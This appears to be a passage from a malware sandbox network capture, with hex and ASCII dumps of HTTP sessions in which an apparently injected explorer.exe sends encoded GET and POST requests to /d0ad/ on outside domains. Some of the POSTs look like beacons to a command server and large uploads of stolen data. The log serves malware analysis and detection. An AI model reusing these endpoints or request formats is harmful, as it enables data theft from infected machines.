Oct 26, 2022 13:18:18.259035110 CEST	1269	IN	Data Raw: 1b ad f6 e5 ad 54 b0 e4 46 f0 f1 5c 14 a2 79 90 fa 22 42 1e 5c d3 63 aa 2d 12 67 e7 60 20 b7 a1 4a f7 84 40 b0 e7 66 76 5b 4e 77 46 76 b2 36 ac 23 51 d6 74 cd 8e 35 0b ed 6e 80 3c cb 31 b4 03 34 36 54 4d 39 a7 e4 61 e5 b7 8e 6c 98 0b 77 1b ae ec Data Ascii: TF\y"B\c-g` J@fv[NwFv6#Qt5n<146TM9alwVX&7NE 6Mtf+yP_8Q)v{=GBLVV:Qbn8[tJ/k<9VE%8TV\PN0@R#7_w*4oL}r;k(
Oct 26, 2022 13:18:18.356818914 CEST	1270	IN	Data Raw: f6 d6 c2 c2 cd f1 61 d8 8f 55 95 17 c6 34 38 b4 45 e0 c3 e3 ae ea 80 d8 20 24 df 40 30 8f 75 10 c6 91 d9 d6 f1 f4 8c 05 1d 2a b1 b0 d4 a0 61 19 96 f6 da 31 87 8d 5d 82 7c 6a be 87 54 de bb 0a ab be 83 e3 15 c7 54 51 76 42 2e 6c 39 d8 c2 f9 ec eb Data Ascii: aU48E $@0ua1]\|jTTQvB.l96Yg21%&LTqmW"t>\o1\q]JeBP<:!]$NS&{a\:1V9G {J0Y6I *l)&J_1i.5+SU/A&)ZCU4W
Oct 26, 2022 13:18:18.356908083 CEST	1272	IN	Data Raw: d2 56 6c 38 3f a4 1d 3f 33 9c 86 b2 61 28 09 81 1e dc 83 3c 75 2c 1c 04 08 cd 7d 2b 98 2f 94 55 dc 04 da de 11 ae ed 41 8f d6 51 06 6f 59 48 a2 c9 e9 26 15 34 fa 64 da ab ed d8 82 29 2e a2 2a c4 b0 96 22 90 0d 93 76 63 a2 ef 2b 8e 0b eb 5a 4b 46 Data Ascii: Vl8??3a(<u,}+/UAQoYH&4d).*"vc+ZKFs_cCfBnB6j18Hu!7^XRV](6\Eb%VecWt#v&L_0W>lumUSsf1rK;\6Y-+V46K=m\|I i-{

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.11.20	49897	216.40.34.41	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:19.855948925 CEST	1306	OUT	GET /d0ad/?jXu=xi3nf1mTlPmwcTH1D3S90LFHOZMhXPM67udBVFKbn8eCFnECdFhGzG3NeZJo25lV+AnrsZF+e668tZdvE6JJ2Emm4ondeffVjQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1 Host: www.motorizedchess.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:18:19.976070881 CEST	1307	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Wed, 26 Oct 2022 11:18:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin ETag: W/"06a985b03a000842527c6f285b458af2" Cache-Control: max-age=0, private, must-revalidate X-Request-Id: 57081020-81e1-4fd2-83f6-e623e21acaa7 X-Runtime: 0.016362 Data Raw: 65 34 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 3a 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 3d 27 20 72 65 6c 3d 27 69 63 6f 6e 27 3e 0a 3c 74 69 74 6c 65 3e 6d 6f 74 6f 72 69 7a 65 64 63 68 65 73 73 2e 63 6f 6d 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 32 66 37 65 37 66 33 30 64 38 31 32 64 30 66 33 39 35 30 39 31 38 63 37 35 36 32 64 66 37 65 36 38 65 65 65 65 62 64 38 36 34 39 62 64 65 61 32 62 63 33 38 34 34 65 62 30 37 66 63 38 32 36 39 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 Data Ascii: e46<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>motorizedchess.com is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://w
Oct 26, 2022 13:18:19.976141930 CEST	1309	IN	Data Raw: 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 Data Ascii: ww.hover.com/?source=parked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>motorizedchess.com</h1><h2>is a totally awesome idea still
Oct 26, 2022 13:18:19.976195097 CEST	1310	IN	Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e Data Ascii: " href="https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your Account</a></
Oct 26, 2022 13:18:19.976239920 CEST	1310	IN	Data Raw: 32 38 2c 35 2e 34 34 33 35 39 20 30 2e 39 31 31 35 35 2c 38 2e 30 31 38 37 35 20 2d 32 39 2e 32 34 33 34 34 2c 2d 31 2e 34 36 37 32 33 20 2d 35 35 2e 31 36 39 39 35 2c 2d 31 35 2e 34 37 35 38 32 20 2d 37 32 2e 35 32 34 36 31 2c 2d 33 36 2e 37 36 Data Ascii: 28,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.
Oct 26, 2022 13:18:19.976291895 CEST	1312	IN	Data Raw: 39 31 37 0d 0a 2e 32 36 37 33 2c 30 20 2d 34 2e 34 37 31 31 34 2c 2d 30 2e 32 32 31 32 34 20 2d 36 2e 36 32 30 31 31 2c 2d 30 2e 36 33 31 31 34 20 34 2e 34 37 38 30 31 2c 31 33 2e 39 37 38 35 37 20 31 37 2e 34 37 32 31 34 2c 32 34 2e 31 35 31 34 Data Ascii: 917.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.9
Oct 26, 2022 13:18:19.976380110 CEST	1313	IN	Data Raw: 74 30 2e 35 20 37 36 2e 35 74 30 20 31 30 35 2e 35 74 2d 33 20 39 36 2e 35 74 2d 31 30 20 31 30 33 74 2d 31 38 2e 35 20 37 31 2e 35 71 2d 32 30 20 35 30 20 2d 35 38 20 38 38 74 2d 38 38 20 35 38 71 2d 32 39 20 31 31 20 2d 37 31 2e 35 20 31 38 2e Data Ascii: t0.5 76.5t0 105.5t-3 96.5t-10 103t-18.5 71.5q-20 50 -58 88t-88 58q-29 11 -71.5 18.5t-103 10t-96.5 3t-105.5 0t-76.5 -0.5zM1536 640q0 -229 -5 -317 q-10 -208 -124 -322t-322 -124q-88 -5 -317 -5t-317 5q-208 10 -322 124t-124 322q-5 88 -5 317t5 317q1

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.11.20	49898	154.221.20.121	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:25.873047113 CEST	1314	OUT	POST /d0ad/ HTTP/1.1 Host: www.donglinwangluo.site Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.donglinwangluo.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.donglinwangluo.site/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 4b 41 50 54 39 55 73 30 5a 34 4f 79 44 71 6d 37 59 41 51 57 61 38 49 45 45 68 63 5f 4c 68 4d 45 36 77 30 61 45 49 6d 31 76 66 4e 4f 71 79 72 6a 55 54 64 45 72 4c 4f 51 74 74 4f 62 54 43 49 35 39 4a 76 4f 75 70 4b 49 6c 74 42 42 6d 52 64 32 37 76 55 6c 54 44 48 2d 30 59 4f 33 39 51 49 74 70 76 76 75 54 5a 50 64 41 61 73 6f 59 48 38 30 4c 39 61 57 6c 5f 55 4c 62 51 78 38 65 68 33 65 39 56 76 53 6a 56 59 38 47 33 39 76 6e 47 44 63 33 46 39 6e 6f 7a 4e 70 61 69 33 32 28 71 6b 38 4f 4a 77 38 70 52 41 37 59 4e 71 47 79 5a 6e 56 65 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=KAPT9Us0Z4OyDqm7YAQWa8IEEhc_LhME6w0aEIm1vfNOqyrjUTdErLOQttObTCI59JvOupKIltBBmRd27vUlTDH-0YO39QItpvvuTZPdAasoYH80L9aWl_ULbQx8eh3e9VvSjVY8G39vnGDc3F9nozNpai32(qk8OJw8pRA7YNqGyZnVeg).
Oct 26, 2022 13:18:26.208539963 CEST	1315	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:18:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 285 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 6f 6e 67 6c 69 6e 77 61 6e 67 6c 75 6f 2e 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.donglinwangluo.site Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.11.20	49899	154.221.20.121	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:28.232522011 CEST	1316	OUT	POST /d0ad/ HTTP/1.1 Host: www.donglinwangluo.site Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.donglinwangluo.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.donglinwangluo.site/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 4b 41 50 54 39 55 73 30 5a 34 4f 79 44 4c 57 37 55 41 73 57 4e 4d 49 44 42 68 63 5f 53 52 4d 41 36 77 34 61 45 4a 79 6c 76 74 5a 4f 71 51 7a 6a 47 47 70 45 73 4c 4f 51 6a 4e 4f 53 58 43 49 69 39 4a 54 73 75 72 65 49 6c 74 56 42 6e 6a 46 32 76 50 55 69 63 54 48 78 7a 59 4f 71 33 77 49 72 70 76 6a 55 54 59 4c 64 41 70 6f 6f 5a 46 6b 30 59 35 32 56 67 66 56 43 66 67 78 39 51 42 33 63 39 56 69 74 6a 51 30 4b 47 42 31 76 6e 6e 6a 63 77 46 39 67 69 44 4e 75 57 43 32 41 76 5a 42 71 45 61 63 6b 37 44 67 6c 51 73 7a 6b 77 4c 79 53 4c 4c 76 2d 64 48 34 48 28 4a 64 62 63 63 53 4c 36 4f 44 39 28 73 63 6b 70 42 64 79 31 59 47 6b 6c 35 72 36 6d 64 70 4f 6e 30 5a 56 72 75 30 65 50 51 66 79 43 44 5a 2d 62 41 38 37 31 46 74 47 7a 2d 72 59 4b 53 6e 38 46 45 72 44 67 75 67 35 62 70 4a 6d 52 72 4b 49 61 61 73 7a 38 33 45 56 47 4a 31 49 46 6d 35 66 78 57 6c 39 58 6e 32 50 4f 6a 57 50 74 69 35 6a 57 31 66 44 64 62 71 4f 35 45 30 53 33 51 7a 63 48 6c 4e 68 42 55 53 6b 31 51 46 36 4b 49 4f 61 50 5f 72 56 74 67 69 58 36 37 49 53 34 65 28 55 50 4e 4d 78 33 75 6b 38 5a 6c 37 51 6e 6c 34 6a 32 6b 4d 2d 68 52 74 69 35 79 49 55 7e 5a 58 64 6a 4d 4f 46 71 78 67 43 54 6e 41 35 4a 73 5a 78 78 62 41 62 43 2d 75 47 6b 59 63 4e 70 4f 69 39 44 69 36 75 71 6e 28 36 69 62 57 56 38 4c 6a 56 76 6e 70 49 41 31 49 70 4f 46 55 65 34 57 36 5f 32 46 65 35 58 51 36 72 45 33 7a 56 75 6c 4c 4b 67 45 48 70 38 6e 57 47 7a 55 52 78 72 4f 39 63 62 62 4b 67 7a 47 51 65 76 4b 4d 4a 6a 38 48 56 46 6e 6a 55 35 32 39 75 73 64 74 53 7e 64 63 77 38 77 6e 66 63 72 39 39 33 45 44 50 44 5f 73 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=KAPT9Us0Z4OyDLW7UAsWNMIDBhc_SRMA6w4aEJylvtZOqQzjGGpEsLOQjNOSXCIi9JTsureIltVBnjF2vPUicTHxzYOq3wIrpvjUTYLdApooZFk0Y52VgfVCfgx9QB3c9VitjQ0KGB1vnnjcwF9giDNuWC2AvZBqEack7DglQszkwLySLLv-dH4H(JdbccSL6OD9(sckpBdy1YGkl5r6mdpOn0ZVru0ePQfyCDZ-bA871FtGz-rYKSn8FErDgug5bpJmRrKIaasz83EVGJ1IFm5fxWl9Xn2POjWPti5jW1fDdbqO5E0S3QzcHlNhBUSk1QF6KIOaP_rVtgiX67IS4e(UPNMx3uk8Zl7Qnl4j2kM-hRti5yIU~ZXdjMOFqxgCTnA5JsZxxbAbC-uGkYcNpOi9Di6uqn(6ibWV8LjVvnpIA1IpOFUe4W6_2Fe5XQ6rE3zVulLKgEHp8nWGzURxrO9cbbKgzGQevKMJj8HVFnjU529usdtS~dcw8wnfcr993EDPD_s.
Oct 26, 2022 13:18:28.572208881 CEST	1317	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:18:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 285 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 6f 6e 67 6c 69 6e 77 61 6e 67 6c 75 6f 2e 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.donglinwangluo.site Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.11.20	49900	154.221.20.121	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:30.586623907 CEST	1318	OUT	POST /d0ad/ HTTP/1.1 Host: www.donglinwangluo.site Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.donglinwangluo.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.donglinwangluo.site/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 4b 41 50 54 39 55 73 30 5a 34 4f 79 44 4c 57 37 55 41 73 57 4e 4d 49 44 42 68 63 5f 53 52 4d 41 36 77 34 61 45 4a 79 6c 76 74 42 4f 71 6c 6e 6a 55 78 46 45 74 4c 4f 51 72 74 4f 66 58 43 4a 69 39 4e 48 6f 75 72 53 79 6c 75 74 42 67 31 56 32 75 36 41 69 51 7a 48 38 76 6f 4f 30 39 51 49 33 70 76 76 49 54 63 69 67 41 61 30 6f 59 43 41 30 4b 65 69 57 38 66 55 4c 66 67 78 35 61 68 33 69 39 56 6d 48 6a 51 34 4b 47 44 42 76 68 56 62 63 31 55 39 67 6c 54 4e 74 63 69 32 54 36 70 42 62 45 61 59 61 37 44 67 66 51 70 54 6b 77 4a 36 53 4d 49 58 78 65 6e 34 48 32 70 64 59 4b 74 75 50 36 4f 76 6c 28 73 59 6b 70 47 68 79 30 34 47 6b 67 59 72 31 30 39 6f 6b 73 55 5a 47 67 4f 34 57 50 51 37 4d 43 42 56 2d 63 77 59 37 32 55 74 47 78 63 50 59 52 53 6e 2d 49 6b 71 66 32 65 68 6d 62 71 67 33 52 72 72 7a 61 64 73 7a 39 53 51 56 57 63 42 4c 53 32 35 5a 30 57 6b 36 63 43 75 44 4f 6a 47 70 74 69 35 7a 57 30 62 44 64 4c 61 4f 33 6c 30 52 36 67 7a 66 4d 46 4e 30 4b 30 58 70 31 51 5a 79 4b 49 48 66 50 34 62 56 74 41 69 58 78 38 6b 52 76 2d 28 54 51 64 4d 6a 7a 75 6c 38 5a 69 7a 4d 6e 6e 55 4a 32 56 51 2d 6a 68 39 69 38 69 49 58 75 35 58 5a 71 73 50 41 75 78 67 43 54 6e 64 64 4a 73 56 78 78 6f 63 62 44 4e 6d 47 69 4c 30 4e 36 2d 69 42 44 69 37 71 71 6e 69 4d 69 62 65 37 38 4c 54 37 76 6b 5a 49 41 6d 41 70 4a 41 67 5a 76 6d 36 36 30 31 65 75 4b 41 32 34 45 33 76 4e 75 6c 37 61 6e 7a 50 70 36 54 32 47 33 55 52 77 67 4f 39 62 4c 4c 4b 36 33 47 73 34 76 4f 6b 7a 6a 39 7a 46 46 6e 62 55 37 53 30 4d 38 4a 35 75 6e 62 63 6a 77 48 4c 4c 53 49 78 6d 6a 58 65 4d 58 6f 53 36 62 59 59 67 4c 50 43 33 5a 2d 57 77 41 43 4a 44 70 6d 4a 73 47 62 43 6e 4b 78 71 57 6c 7a 57 31 35 74 71 67 6f 73 71 47 59 4b 51 62 64 4a 44 5f 4d 73 78 71 53 74 42 79 34 47 46 39 49 75 67 43 58 63 36 70 5a 71 41 36 44 64 4b 73 78 69 6c 33 6d 54 70 61 70 52 37 72 66 6b 31 76 43 71 6f 59 64 67 71 63 55 76 36 48 6b 57 59 6d 28 71 46 2d 41 38 63 4d 4b 51 31 5f 79 6c 39 33 62 58 56 57 6c 30 48 53 6c 35 35 68 32 51 62 45 32 51 66 52 6c 57 51 51 68 69 34 32 32 63 6d 70 65 69 52 41 55 31 43 72 59 4c 4c 73 43 76 58 67 51 5f 77 5f 44 63 4c 6f 32 6a 39 63 44 64 66 6d 39 67 31 44 56 4b 63 72 76 54 66 56 67 4a 28 7a 6c 76 52 73 59 4b 6c 39 77 50 75 77 34 78 35 5a 70 64 63 32 4f 75 39 45 59 72 41 34 6e 6f 4b 51 46 4f 32 4d 54 78 53 39 77 69 70 52 45 43 75 4b 47 32 53 58 43 5f 69 72 74 76 68 78 7e 58 4f 6d 58 6e 72 54 4b 50 4e 30 43 77 28 77 72 58 58 67 7a 70 43 36 28 42 6f 6c 48 66 72 53 70 77 36 51 55 4a 49 41 41 70 53 33 47 57 6d 77 38 36 57 44 36 2d 42 61 43 78 76 61 38 71 52 45 69 4b 55 53 6a 6a 78 52 73 44 31 64 4f 63 74 6b 6e 50 42 Data Ascii: jXu=KAPT9Us0Z4OyDLW7UAsWNMIDBhc_SRMA6w4aEJylvtBOqlnjUxFEtLOQrtOfXCJi9NHourSylutBg1V2u6AiQzH8voO09QI3pvvITcigAa0oYCA0KeiW8fULfgx5ah3i9VmHjQ4KGDBvhVbc1U9glTNtci2T6pBbEaYa7DgfQpTkwJ6SMIXxen4H2pdYKtuP6Ovl(sYkpGhy04GkgYr109oksUZGgO4WPQ7MCBV-cwY72UtGxcPYRSn-Ikqf2ehmbqg3Rrrzadsz9SQVWcBLS25Z0Wk6cCuDOjGpti5zW0bDdLaO3l0R6gzfMFN0K0Xp1QZyKIHfP4bVtAiXx8kRv-(TQdMjzul8ZizMnnUJ2VQ-jh9i8iIXu5XZqsPAuxgCTnddJsVxxocbDNmGiL0N6-iBDi7qqniMibe78LT7vkZIAmApJAgZvm6601euKA24E3vNul7anzPp6T2G3URwgO9bLLK63Gs4vOkzj9zFFnbU7S0M8J5unbcjwHLLSIxmjXeMXoS6bYYgLPC3Z-WwACJDpmJsGbCnKxqWlzW15tqgosqGYKQbdJD_MsxqStBy4GF9IugCXc6pZqA6DdKsxil3mTpapR7rfk1vCqoYdgqcUv6HkWYm(qF-A8cMKQ1_yl93bXVWl0HSl55h2QbE2QfRlWQQhi422cmpeiRAU1CrYLLsCvXgQ_w_DcLo2j9cDdfm9g1DVKcrvTfVgJ(zlvRsYKl9wPuw4x5Zpdc2Ou9EYrA4noKQFO2MTxS9wipRECuKG2SXC_irtvhx~XOmXnrTKPN0Cw(wrXXgzpC6(BolHfrSpw6QUJIAApS3GWmw86WD6-BaCxva8qREiKUSjjxRsD1dOctknPB
Oct 26, 2022 13:18:30.586700916 CEST	1327	OUT	Data Raw: 52 79 53 57 47 7a 58 50 51 38 63 52 2d 28 4b 43 65 42 55 38 51 62 30 52 37 74 74 34 42 6f 69 6b 49 64 35 35 6f 65 63 28 6b 4d 6c 6a 58 43 47 72 39 67 77 52 35 78 64 6a 72 4e 2d 4b 55 38 38 33 35 4a 32 4a 37 30 4f 75 63 7a 70 44 38 75 54 77 70 48 Data Ascii: RySWGzXPQ8cR-(KCeBU8Qb0R7tt4BoikId55oec(kMljXCGr9gwR5xdjrN-KU8835J2J70OuczpD8uTwpHdr3j0SsxPS_Q77rt69DjpMgk1oJpfRWx2ewzOw3E63cKcbIfdQJ(8uxvlzQnAvTN6LFoVO8CPw35BNpdeTBcWKVo5fwiRZGZqAPChTtjJQjFFdzFN(ofDMD2mhxPJQ2vlJnbtzQKGKyrz77bzwWeG12koWTRSCGcs
Oct 26, 2022 13:18:30.586760044 CEST	1330	OUT	Data Raw: 49 42 63 61 75 38 45 5a 79 66 38 39 45 51 59 57 4f 57 35 31 70 6e 36 37 34 67 54 70 45 73 6d 7e 75 37 67 7e 4b 4f 55 39 4d 4c 57 4d 52 30 69 48 73 35 68 36 54 35 4f 4f 30 67 79 42 4a 4d 65 36 4c 33 38 49 38 47 32 33 79 39 39 30 37 49 50 66 6a 68 Data Ascii: IBcau8EZyf89EQYWOW51pn674gTpEsm~u7g~KOU9MLWMR0iHs5h6T5OO0gyBJMe6L38I8G23y9907IPfjhl~hnKFBlfCf~1plnkYjwbhMOMpK3u70ZNguzMcCNWGW~X8S(ZmwPxaTVjTM1nHX44kUbeh7NLt9SVriRqoG6n56SU8xBKc09R2jyZ9uBGH1aCPxVvUnQtnn5MKNvEjLDwleXnM1qwQ3fhGEkaWRWWL6C_b_r-XA2c
Oct 26, 2022 13:18:30.920855999 CEST	1332	OUT	Data Raw: 71 4d 70 6d 57 70 4c 6c 4a 49 4d 32 54 49 4a 74 71 66 73 36 63 6c 79 47 78 75 54 67 5a 6a 69 6b 6f 35 34 70 41 54 74 53 7a 56 66 49 43 77 4d 6b 35 53 6c 77 77 6a 34 32 79 50 36 4b 56 4b 64 77 59 49 57 38 75 55 4c 58 36 71 4a 36 71 4b 65 6a 58 46 Data Ascii: qMpmWpLlJIM2TIJtqfs6clyGxuTgZjiko54pATtSzVfICwMk5Slwwj42yP6KVKdwYIW8uULX6qJ6qKejXFF2_J_aSuIKHUxPoCGji2bWrkVQY7Ao9RrnNTWGLOTilgvCnxIJ14TK90FS7HidMM6i_SqT645w06OM_dFLaZnRx~o~tAwd_WTD7TdszS1VlLDl8KiR5jnT1VwYu~wD2mVT-NGdgDqqmFidUFwqWD7Ws5jpZAf4oOg
